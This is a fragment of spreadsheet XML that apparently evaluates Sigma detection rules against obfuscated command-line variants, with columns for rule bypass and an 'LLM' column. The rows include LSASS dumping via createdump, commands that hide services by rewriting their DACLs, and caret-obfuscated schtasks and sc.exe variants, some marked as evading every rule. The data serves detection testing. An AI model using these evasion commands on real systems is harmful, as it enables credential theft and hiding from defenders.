          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C487" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D487" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E487" s="41" t="inlineStr">
        <is>
          <t>net	use	\192.0.2.10\share	/USER:domain\user	password</t>
        </is>
      </c>
      <c r="F487" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G487" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H487" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I487" s="41" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J487" s="41" t="n"/>
      <c r="K487" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B488" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C488" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D488" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E488" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:"domain\user" password</t>
        </is>
      </c>
      <c r="F488" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G488" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H488" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I488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488" s="41" t="n"/>
      <c r="K488" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B489" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C489" s="41" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D489" s="41" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E489" s="41" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name AtomicService -SecurityDescriptorSddl 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'"</t>
        </is>
      </c>
      <c r="F489" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G489" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H489" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I489" s="41" t="n"/>
      <c r="J489" s="41" t="n"/>
      <c r="K489" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B490" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C490" s="41" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D490" s="41" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E490" s="41" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name `"AtomicService`" -SecurityDescriptorSddl `"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`""</t>
        </is>
      </c>
      <c r="F490" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G490" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H490" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I490" s="41" t="n"/>
      <c r="J490" s="41" t="n"/>
      <c r="K490" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B491" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C491" s="41" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D491" s="41" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E491" s="41" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name AtomicService -sd 'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'"</t>
        </is>
      </c>
      <c r="F491" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G491" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H491" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I491" s="41" t="n"/>
      <c r="J491" s="41" t="n"/>
      <c r="K491" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B492" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C492" s="41" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D492" s="41" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E492" s="41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492" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G492" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H492" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I492" s="41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492" s="41" t="n"/>
      <c r="K492" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B493" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C493" s="41" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D493" s="41" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E493" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe sdset AtomicService "D:(D;;DCLCWPDT^SD;;;IU)(D;;DCLCWPDT^SD;;;SU)(D;;DCLCWPDT^SD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F493" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G493" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H493" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I493" s="41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493" s="41" t="n"/>
      <c r="K493" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B494" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C494" s="41" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D494" s="41" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E494" s="41" t="inlineStr">
        <is>
          <t>sc.exe sdset AtomicService "D:(D;;SDDTWPWPLCDC;;;IU)(D;;SDDTWPWPLCDC;;;SU)(D;;SDDTWPWPLCDC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F494" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G494" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H494" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I494" s="41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494" s="41" t="n"/>
      <c r="K494" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B495" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C495" s="41" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D495" s="41" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E495" s="41" t="inlineStr">
        <is>
          <t>sc.exe "sdset" BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F495" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G495" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H495" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I495" s="41" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J495" s="41" t="n"/>
      <c r="K495" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B496" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C496" s="41" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D496" s="41" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E496" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe s^dset BenignService "D:(D;;DCLCWPDTSD;;;IU)"</t>
        </is>
      </c>
      <c r="F496" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G496" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="41" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE (a537cfc3-4297-4789-92b5-345bfd845ad0); Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J496" s="41" t="n"/>
      <c r="K496" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="41" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B497" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C497" s="41" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D497" s="41" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E497" s="41" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename C:\\Program Files\\MyApp.exe -Run -WindowState 0 -RunAs -CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F497" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G497" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="41" t="n"/>
      <c r="J497" s="41" t="n"/>
      <c r="K497" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="41" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B498" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C498" s="41" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D498" s="41" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E498" s="41" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename C:\Program Files\MyApp.exe /Run /WindowState0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F498" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G498" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H498" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I498" s="41" t="n"/>
      <c r="J498" s="41" t="n"/>
      <c r="K498" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="41" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B499" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C499" s="41" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D499" s="41" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E499" s="41" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /Run /EXEFilename C:\Program Files\MyApp.exe /WindowState 0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F499" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G499" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H499" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I499" s="41" t="n"/>
      <c r="J499" s="41" t="n"/>
      <c r="K499" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="41" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B500" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C500" s="41" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D500" s="41" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E500" s="41" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "C:\\\Program Files\\\AdvancedRun\\\example.exe" /CommandLine "arg1 arg2" /RunAs 8</t>
        </is>
      </c>
      <c r="F500" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G500" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="41" t="n"/>
      <c r="J500" s="41" t="n"/>
      <c r="K500" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="41" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B501" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C501" s="41" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D501" s="41" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E501" s="41" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename %PROGRAMFILES%\\AdvancedRun\\example.exe /CommandLine arg1 arg2 /RunAs 10</t>
        </is>
      </c>
      <c r="F501" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G501" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H501" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I501" s="41" t="n"/>
      <c r="J501" s="41" t="n"/>
      <c r="K501" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B502" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C502" s="41" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D502" s="41" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E502" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe  /create /tn "BenignTask1" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F502" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G502" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H502" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I502" s="41" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J502" s="41" t="n"/>
      <c r="K502" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B503" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C503" s="41" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D503" s="41" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E503" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "BenignTask2" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F503" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G503" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H503" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="41" t="n"/>
      <c r="J503" s="41" t="n"/>
      <c r="K503" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B504" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C504" s="41" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D504" s="41" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E504" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "BenignTask3" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F504" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G504" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H504" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I504" s="41" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J504" s="41" t="n"/>
      <c r="K504" s="41" t="b">
        <v>0</v>
      </c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840"/>
  <dataValidations count="3">
    <dataValidation sqref="J2:J345" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))</formula1>
    </dataValidation>
    <dataValidation sqref="F2:H345" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"FALSE,TRUE"</formula1>
    </dataValidation>
    <dataValidation sqref="A2:A345" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1003,t1027,t1055.001,t1564.003,t1068,t1106,t1134,t1134.002,t1548.002,t1218.013,t1518,t1546.007,t1546.008,t1546.015,t1548,t1552.001,t1555,t1555.003,t1033,t1036,t1046,t1053.002,t1053.005,t1082,t1562.002,t1087,t1212,t1484.001,t1543.003,t1546.002,t1546.011,t"&amp;"1574.011,t1021.002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9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73.86" customWidth="1" style="42" min="2" max="2"/>
    <col width="49.86" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="69.86" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="35" t="inlineStr">
        <is>
          <t>Technical</t>
        </is>
      </c>
      <c r="B1" s="35" t="inlineStr">
        <is>
          <t>Rule_name</t>
        </is>
      </c>
      <c r="C1" s="35" t="inlineStr">
        <is>
          <t>Title</t>
        </is>
      </c>
      <c r="D1" s="35" t="inlineStr">
        <is>
          <t>Rule_id</t>
        </is>
      </c>
      <c r="E1" s="35" t="inlineStr">
        <is>
          <t>Commandline_evasion</t>
        </is>
      </c>
      <c r="F1" s="35" t="inlineStr">
        <is>
          <t>Excutable</t>
        </is>
      </c>
      <c r="G1" s="35" t="inlineStr">
        <is>
          <t>Bypass target rule</t>
        </is>
      </c>
      <c r="H1" s="35" t="inlineStr">
        <is>
          <t>Bypass all rule</t>
        </is>
      </c>
      <c r="I1" s="35" t="inlineStr">
        <is>
          <t>Trigger rule</t>
        </is>
      </c>
      <c r="J1" s="35" t="inlineStr">
        <is>
          <t>LLM</t>
        </is>
      </c>
      <c r="K1" s="35" t="inlineStr">
        <is>
          <t>behavior</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2" s="36" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2" s="36" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "-u" "-f" C:\Users\Public\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F2" s="39" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3" s="36" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3" s="36" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E3" s="36" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" --full --name C:\Users\Public\dotnet-lsass.dmp  788</t>
        </is>
      </c>
      <c r="F3" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K3" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="43" t="n"/>
      <c r="B4" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C4" s="36" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D4" s="36" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E4" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\update_service.exe -p^rocess lsass.exe -m c^omsvcs"</t>
        </is>
      </c>
      <c r="F4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="36" t="n"/>
      <c r="J4" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K4" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="43" t="n"/>
      <c r="B5" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C5" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D5" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E5" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "malicious_dump.exe --full --name C:\temp\lsass.d^mp 756"</t>
        </is>
      </c>
      <c r="F5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="36" t="n"/>
      <c r="J5" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K5" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="43" t="n"/>
      <c r="B6" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C6" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D6" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E6" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F6" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G6" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H6" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I6" s="36" t="n"/>
      <c r="J6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="43" t="n"/>
      <c r="B7" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C7" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D7" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E7" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="36" t="b">
        <v>0</v>
